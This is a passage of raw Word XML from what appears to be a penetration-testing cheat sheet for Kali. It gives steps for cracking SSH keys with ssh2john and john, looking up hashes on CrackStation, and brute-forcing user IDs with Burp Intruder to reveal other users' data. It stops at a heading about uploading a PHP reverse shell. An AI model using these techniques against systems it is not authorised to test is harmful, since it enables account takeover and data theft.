              <w:t>Google ‘crackstation’ to be taken to the crackstation webpage. Copy&amp;Paste the hash in.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004F00DA" w14:paraId="7BDBCD26" w14:textId="77777777" w:rsidTr="000C579C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="24F696BD" w14:textId="22FE7F2C" w:rsidR="004F00DA" w:rsidRDefault="00F0782F" w:rsidP="00C40FD7">
            <w:r>
              <w:t>8</w:t>
            </w:r>
            <w:r w:rsidR="007118F6">
              <w:t>6</w:t>
            </w:r>
            <w:r w:rsidR="009A029F">
              <w:t>.h</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2393" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="CCFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="2301A10F" w14:textId="77777777" w:rsidR="004F00DA" w:rsidRDefault="004F00DA" w:rsidP="00C40FD7">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8023" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="108C9278" w14:textId="77777777" w:rsidR="004F00DA" w:rsidRDefault="004F00DA" w:rsidP="00C40FD7">
            <w:r>
              <w:t>CrackStation supports: LM, NTLM, md2, md4, md5, md5(md5_hex), md5-half, sha1, sha224, sha256, sha384, sha512, ripeMD160, whirlpool, MySQL 4.1+ (sha1(sha1_bin)), QubesV3.1BackupDefaults</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004F00DA" w14:paraId="340D6ADF" w14:textId="77777777" w:rsidTr="000C579C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="11922E01" w14:textId="77777777" w:rsidR="004F00DA" w:rsidRDefault="004F00DA" w:rsidP="00C40FD7"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2393" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="CCFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="2FFB9323" w14:textId="77777777" w:rsidR="004F00DA" w:rsidRDefault="004F00DA" w:rsidP="00C40FD7">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8023" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="61487716" w14:textId="77777777" w:rsidR="004F00DA" w:rsidRDefault="004F00DA" w:rsidP="00C40FD7"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5BDEC9E7" w14:textId="4DE7B24B" w:rsidR="00562F49" w:rsidRDefault="00562F49">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="734831E1" w14:textId="77777777" w:rsidR="005C74B8" w:rsidRDefault="005C74B8" w:rsidP="005C74B8">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Specific Exploits and Escalation: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ssh2john</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B23847" w14:paraId="283AB490" w14:textId="77777777" w:rsidTr="000C579C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="4FAB2F51" w14:textId="6F69B8EC" w:rsidR="00B23847" w:rsidRDefault="000C579C" w:rsidP="006322D3">
            <w:r>
              <w:t>8</w:t>
            </w:r>
            <w:r w:rsidR="007118F6">
              <w:t>7</w:t>
            </w:r>
            <w:r w:rsidR="00B23847">
              <w:t>.a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2392" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="CCFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="754324DE" w14:textId="5C2F8BE5" w:rsidR="00B23847" w:rsidRPr="00C3613A" w:rsidRDefault="00B23847" w:rsidP="006322D3">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>ssh2john</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>(ssh2john is installed but is not automatically configured to be a command in Kali)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8024" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="057A4F5A" w14:textId="77777777" w:rsidR="00B23847" w:rsidRPr="0011225F" w:rsidRDefault="00B23847" w:rsidP="006322D3">
            <w:pPr>
              <w:rPr>
                <w:color w:val="7030A0"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0011225F">
              <w:rPr>
                <w:color w:val="7030A0"/>
              </w:rPr>
              <w:t>IF YOU HAVE AN SSH RSA (RIVEST-SHAMIR-ADLEMAN) KEY, USE SSH2JOHN, OTHERWISE SKIP.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1D8A3CA4" w14:textId="77777777" w:rsidR="00B23847" w:rsidRDefault="00B23847" w:rsidP="006322D3">
            <w:r>
              <w:t xml:space="preserve">This tool is a python script that lies within Kali but is not set up to be a command off the bad, we can copy the original script though somewhere more memorable and run it with </w:t>
            </w:r>
            <w:r w:rsidRPr="0011225F">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>./</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="06DB9086" w14:textId="77777777" w:rsidR="00B23847" w:rsidRDefault="00B23847" w:rsidP="006322D3"/>
          <w:p w14:paraId="56DE4645" w14:textId="5400A9DF" w:rsidR="00B23847" w:rsidRDefault="00B23847" w:rsidP="006322D3">
            <w:r>
              <w:t>First off, cd to the script’s original place in Kali:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00026079">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">cd </w:t>
            </w:r>
            <w:r w:rsidRPr="00026079">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>/usr/share/john/</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00856033">
              <w:t>Now, copy the file to a more memorable location:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00856033">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>cp</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00856033">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>ssh2john.py</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="005F5286">
              <w:rPr>
                <w:color w:val="385623" w:themeColor="accent6" w:themeShade="80"/>
              </w:rPr>
              <w:t>~/Documents</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t>Don’t forget to cd to the new file location:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="005F5286">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>cd</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="005F5286">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>~/Documents</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B23847" w14:paraId="2A01CDAE" w14:textId="77777777" w:rsidTr="000C579C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="6F2DB693" w14:textId="74E6527C" w:rsidR="00B23847" w:rsidRDefault="000C579C" w:rsidP="006322D3">
            <w:r>
              <w:t>8</w:t>
            </w:r>
            <w:r w:rsidR="007118F6">
              <w:t>7</w:t>
            </w:r>
            <w:r w:rsidR="00B23847">
              <w:t>.b</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2392" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="CCFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="47C2236E" w14:textId="7BB42A09" w:rsidR="00B23847" w:rsidRPr="005C74B8" w:rsidRDefault="006322D3" w:rsidP="005C74B8">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>john</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="006322D3">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>(john is installed on Kali by default)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8024" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1AB8437D" w14:textId="1BD9768D" w:rsidR="00B23847" w:rsidRDefault="00B23847" w:rsidP="006322D3">
            <w:r>
              <w:t>Once you have the script ready to use, use:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="005F5286">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>./</w:t>
            </w:r>
            <w:r w:rsidRPr="005F5286">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t xml:space="preserve">ssh2john.py </w:t>
            </w:r>
            <w:r w:rsidRPr="005F5286">
              <w:rPr>
                <w:color w:val="385623" w:themeColor="accent6" w:themeShade="80"/>
              </w:rPr>
              <w:t>FILEWITHRSA.KEY</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="385623" w:themeColor="accent6" w:themeShade="80"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00B23847">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>&gt;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="385623" w:themeColor="accent6" w:themeShade="80"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00B23847">
              <w:rPr>
                <w:color w:val="538135" w:themeColor="accent6" w:themeShade="BF"/>
              </w:rPr>
              <w:t>NEWFILE</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="538135" w:themeColor="accent6" w:themeShade="BF"/>
              </w:rPr>
              <w:t>.txt</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="538135" w:themeColor="accent6" w:themeShade="BF"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00B23847">
              <w:t>Now, we have a new file which will be John readable</w:t>
            </w:r>
            <w:r w:rsidR="00882AEF">
              <w:t>, use:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="538135" w:themeColor="accent6" w:themeShade="BF"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00882AEF" w:rsidRPr="00882AEF">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>john</w:t>
            </w:r>
            <w:r w:rsidR="00882AEF">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00882AEF" w:rsidRPr="00882AEF">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>NEWFILE</w:t>
            </w:r>
            <w:r w:rsidR="004F00DA">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>.txt</w:t>
            </w:r>
            <w:r w:rsidR="006322D3">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="006322D3" w:rsidRPr="001E0F42">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-w</w:t>
            </w:r>
            <w:r w:rsidR="006322D3">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>ordlist=</w:t>
            </w:r>
            <w:r w:rsidR="006322D3" w:rsidRPr="001E0F42">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>/usr/share/john/rockyou.txt</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00562F49" w14:paraId="1EFD0106" w14:textId="77777777" w:rsidTr="000C579C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="27789590" w14:textId="77777777" w:rsidR="00562F49" w:rsidRDefault="00562F49" w:rsidP="006322D3"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2392" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="CCFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="580E8483" w14:textId="77777777" w:rsidR="00562F49" w:rsidRDefault="00562F49" w:rsidP="006322D3">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8024" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3FFE6F34" w14:textId="77777777" w:rsidR="00562F49" w:rsidRPr="001E0F42" w:rsidRDefault="00562F49" w:rsidP="006322D3"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6B1D0291" w14:textId="34ACF4FE" w:rsidR="005C74B8" w:rsidRDefault="005C74B8" w:rsidP="00562F49"/>
    <w:p w14:paraId="6A3F7AA2" w14:textId="77777777" w:rsidR="005C74B8" w:rsidRDefault="005C74B8">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="464C249C" w14:textId="57996340" w:rsidR="005C74B8" w:rsidRDefault="005C74B8" w:rsidP="005C74B8">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Specific Exploits and Escalation: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Changing user ID values</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814CF0" w14:paraId="1F885BDA" w14:textId="77777777" w:rsidTr="000C579C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="72060116" w14:textId="26E88DC1" w:rsidR="00814CF0" w:rsidRDefault="00681C46" w:rsidP="00622B62">
            <w:r>
              <w:t>8</w:t>
            </w:r>
            <w:r w:rsidR="007118F6">
              <w:t>8</w:t>
            </w:r>
            <w:r w:rsidR="00814CF0">
              <w:t>.a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2392" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="CCFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="6B648AC5" w14:textId="241ED805" w:rsidR="00814CF0" w:rsidRPr="00C3613A" w:rsidRDefault="00814CF0" w:rsidP="00622B62">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>burp</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>(burp suite is installed on Kali by default)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8024" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0B2CA96C" w14:textId="6A0B97C4" w:rsidR="00814CF0" w:rsidRPr="0011225F" w:rsidRDefault="00814CF0" w:rsidP="00622B62">
            <w:pPr>
              <w:rPr>
                <w:color w:val="7030A0"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="7030A0"/>
              </w:rPr>
              <w:t>SOMETIMES, IT MAY BE POSSIBLE TO VIEW HIDDEN CONTENT ON A WEBPAGE BY BRUTEFORCING ID NUMBER VALUES.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2B52B8CD" w14:textId="0159E444" w:rsidR="00814CF0" w:rsidRDefault="00814CF0" w:rsidP="00622B62">
            <w:r>
              <w:t xml:space="preserve">Use </w:t>
            </w:r>
            <w:r w:rsidRPr="00814CF0">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>‘Proxy’</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> &gt; </w:t>
            </w:r>
            <w:r w:rsidRPr="00814CF0">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>‘Intercept’</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> options in burp while browsing a web page and you may find certain cookies or parameters can be tweaked and sent back to the server, possibly brute forcing to reveal other user credentials and information.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00814CF0" w14:paraId="3A00B020" w14:textId="77777777" w:rsidTr="000C579C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="4D3889B2" w14:textId="1AD8D900" w:rsidR="00814CF0" w:rsidRDefault="00681C46" w:rsidP="00622B62">
            <w:r>
              <w:t>8</w:t>
            </w:r>
            <w:r w:rsidR="007118F6">
              <w:t>8</w:t>
            </w:r>
            <w:r w:rsidR="00814CF0">
              <w:t>.b</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2392" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="CCFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="6A4D5807" w14:textId="49BD830C" w:rsidR="00814CF0" w:rsidRPr="005C74B8" w:rsidRDefault="00814CF0" w:rsidP="005C74B8">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8024" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3436EBCC" w14:textId="4A53EC5F" w:rsidR="00814CF0" w:rsidRDefault="00814CF0" w:rsidP="00622B62">
            <w:r>
              <w:t>A useful command to produce a list of numbers from 1 to 100 in terminal is:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006D7AAF">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>for i in `</w:t>
            </w:r>
            <w:r w:rsidRPr="006D7AAF">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>seq 1 100</w:t>
            </w:r>
            <w:r w:rsidRPr="006D7AAF">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">`; do echo </w:t>
            </w:r>
            <w:r w:rsidRPr="006D7AAF">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>$i</w:t>
            </w:r>
            <w:r w:rsidRPr="006D7AAF">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>; done</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="006D7AAF">
              <w:t xml:space="preserve">This can then be copied into burp’s </w:t>
            </w:r>
            <w:r>
              <w:t>‘</w:t>
            </w:r>
            <w:r w:rsidRPr="006D7AAF">
              <w:t>Intruder</w:t>
            </w:r>
            <w:r>
              <w:t>’ module to brute force, searching for other user ID’s.</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t>Be sure to change the ‘Follow redirections’ option to ‘Always’ and ‘Process cookies in redirections’</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C74B8" w14:paraId="279495FC" w14:textId="77777777" w:rsidTr="000C579C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="47718C3F" w14:textId="77777777" w:rsidR="005C74B8" w:rsidRDefault="005C74B8" w:rsidP="00622B62"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2392" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="CCFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="6A1E37CF" w14:textId="77777777" w:rsidR="005C74B8" w:rsidRDefault="005C74B8" w:rsidP="00622B62">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8024" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="244FE1C2" w14:textId="77777777" w:rsidR="005C74B8" w:rsidRPr="001E0F42" w:rsidRDefault="005C74B8" w:rsidP="00622B62"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="328160F9" w14:textId="58EB122D" w:rsidR="00814CF0" w:rsidRDefault="00814CF0" w:rsidP="005C74B8"/>
    <w:p w14:paraId="4D2521BD" w14:textId="77777777" w:rsidR="00814CF0" w:rsidRDefault="00814CF0">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="248C1DE3" w14:textId="68CEEEBB" w:rsidR="00814CF0" w:rsidRDefault="00814CF0" w:rsidP="00814CF0">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Specific Exploits and Escalation: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Uploading php reverse shell</w:t>
      </w:r>
